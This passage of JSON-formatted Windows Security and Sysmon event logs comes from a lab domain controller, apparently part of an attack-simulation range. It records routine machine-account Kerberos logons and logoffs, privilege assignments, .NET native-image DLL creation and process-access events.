08:03:32.742","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21D4-5F25-0000-00108E0C0A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220689,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA118E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa118e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220690,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA118E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t50229\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa118e","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"50229","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:36","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220691,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA118E\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa118e","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220692,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA12EE\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa12ee","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220693,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA12EE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50231\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa12ee","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50231","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220694,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA12EE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa12ee","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220695,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA135A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa135a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220696,"ProcessID":864,"ThreadID":2652,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA135A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50232\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa135a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::286a:52de:ea43:8266","IpPort":"50232","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:37","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220697,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA135A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xa135a","LogonType":"3","EventReceivedTime":"2020-08-01 08:03:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:39.554\r\nProcessGuid: {41C8662E-21D4-5F25-0000-00108E0C0A00}\r\nProcessId: 4700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 08:03:39.554","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:39.554","ProcessGuid":"{41C8662E-21D4-5F25-0000-00108E0C0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.Core.dll","CreationUtcTime":"2020-08-01 08:03:39.554","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:39.711\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21DB-5F25-0000-0010D7140A00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:39.711","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21DB-5F25-0000-0010D7140A00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:39.711\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21DB-5F25-0000-0010D7140A00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:39.711","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21DB-5F25-0000-0010D7140A00}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
